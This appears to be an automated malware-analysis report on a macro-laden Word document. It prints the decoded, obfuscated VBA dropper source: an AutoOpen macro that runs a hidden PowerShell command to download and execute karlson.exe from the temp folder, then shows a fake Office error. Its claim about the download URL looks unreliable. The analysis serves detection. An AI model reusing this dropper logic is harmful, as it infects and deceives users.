Verdict: MALICIOUS
Risk Score: 190

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a VBA macro that uses CreateObject to obtain a shell object and run a command through it. That command assembles a PowerShell one-liner which downloads a file named 'karlson.exe' from the URL 'http://schemas.openxmlformats.org/drawingml/2006/main/' into the user's temporary directory and then executes it. To cover its tracks, the macro also shows the user a fake Microsoft Office error message.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-5907339-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-5907339-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
  ewrtgcx = "art-Pro"
  Set dsfasD = CreateObject("W" + fiod.iuonx + "l")
  kdjfjjf = "(New-Object " + fiod.tutee + "tem.N" + fiod.wred + "Cli" + fiod.tiyjh + ")"
- cmd.exe reference in VBA (high, OLE_VBA_CMD): cmd.exe reference in VBA. Matched lines in script:
  lhjtr = ".DownloadFile('" + fiod.sdwsx + fiod.tyjcx + fiod.serds + "bk','%" + yuijhg + "P%\karlson.exe');St" + ewrtgcx + "cess '%" + yuijhg + "P%\karlson.exe';"
  jkaswhdqw = "cmd /c " + fiod.ertgf + fiod.vbnt + " " + kdjfjjf + lhjtr + ""
  dsfasD.Run jkaswhdqw, vbHide
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  nvbuwsiug
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3309 bytes |

SHA-256 of macros.bas: a41b36a254d1341c16769e16607252ce89b451333b3acedf354c68db6d6b9780

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
nvbuwsiug
End Sub
Attribute VB_Name = "jhdf"
Function nvbuwsiug()
uimhmv = "M"
zxcdsf = "T"
yuijhg = zxcdsf + uimhmv
ewrtgcx = "art-Pro"
Set dsfasD = CreateObject("W" + fiod.iuonx + "l")
kdjfjjf = "(New-Object " + fiod.tutee + "tem.N" + fiod.wred + "Cli" + fiod.tiyjh + ")"
lhjtr = ".DownloadFile('" + fiod.sdwsx + fiod.tyjcx + fiod.serds + "bk','%" + yuijhg + "P%\karlson.exe');St" + ewrtgcx + "cess '%" + yuijhg + "P%\karlson.exe';"
jkaswhdqw = "cmd /c " + fiod.ertgf + fiod.vbnt + " " + kdjfjjf + lhjtr + ""
dsfasD.Run jkaswhdqw, vbHide
MsgBox "Wo" + "rd has encountered a pr" + "oble" + "m", 16, "Microsoft Office"
End Function
Attribute VB_Name = "fiod"
Attribute VB_Base = "0{CAD30E07-1A57-4E0B-984B-104408B894C7}{33A39420-1A39-4A3E-9E12-16F8E65C86C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Processing file: /opt/analyzer/scan_staging/8e81e8680f6f4722a0078db4c85d9610.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1300 bytes
' Line #0:
' FuncDefn (Sub zxcdsf())
' Line #1:
' ArgsCall yuijhg 0x0000
' Line #2:
' EndSub
' Macros/VBA/jhdf - 2046 bytes
' Line #0:
' FuncDefn (Function yuijhg())
' Line #1:
' LitStr 0x0001 "M"
' St dsfasD
' Line #2:
' LitStr 0x0001 "T"
' St CreateObject
' Line #3:
' Ld CreateObject
' Ld dsfasD
' Add
' St fiod
' Line #4:
' LitStr 0x0007 "art-Pro"
' St iuonx
' Line #5:
' SetStmt
' LitStr 0x0001 "W"
' Ld wred
' MemLd tiyjh
' Add
' LitStr 0x0001 "l"
' Add
' ArgsLd tutee 0x0001
' Set kdjfjjf
' Line #6:
' LitStr 0x000C "(New-Object "
' Ld wred
' MemLd jkaswhdqw
' Add
' LitStr 0x0005 "tem.N"
' Add
' Ld wred
' MemLd ertgf
' Add
' LitStr 0x0003 "Cli"
' Add
' Ld wred
' MemLd vbnt
' Add
' LitStr 0x0001 ")"
' Add
' St lhjtr
' Line #7:
' LitStr 0x000F ".DownloadFile('"
' Ld wred
' MemLd tyjcx
' Add
' Ld wred
' MemLd id_026E
' Add
' Ld wred
' MemLd id_0270
' Add
' LitStr 0x0006 "bk','%"
' Add
' Ld fiod
' Add
' LitStr 0x0013 "P%\karlson.exe');St"
' Add
' Ld iuonx
' Add
' LitStr 0x0007 "cess '%"
' Add
' Ld fiod
' Add
' LitStr 0x0010 "P%\karlson.exe';"
' Add
' St Run
' Line #8:
' LitStr 0x0007 "cmd /c "
' Ld wred
' MemLd Document
' Add
' Ld wred
' MemLd _B_var_uimhmv
' Add
' LitStr 0x0001 " "
' Add
' Ld lhjtr
' Add
' Ld Run
' Add
' LitStr 0x0000 ""
' Add
' St vbHide
' Line #9:
' Ld vbHide
' Ld _B_var_yuijhg
' Ld kdjfjjf
' ArgsMemCall _B_var_zxcdsf 0x0002
' Line #10:
' LitStr 0x0002 "Wo"
' LitStr 0x0017 "rd has encountered a pr"
' Add
' LitStr 0x0004 "oble"
' Add
' LitStr 0x0001 "m"
' Add
' LitDI2 0x0010
' LitStr 0x0010 "Microsoft Office"
' ArgsCall id_0272 0x0003
' Line #11:
' EndFunc
' Macros/VBA/fiod - 1409 bytes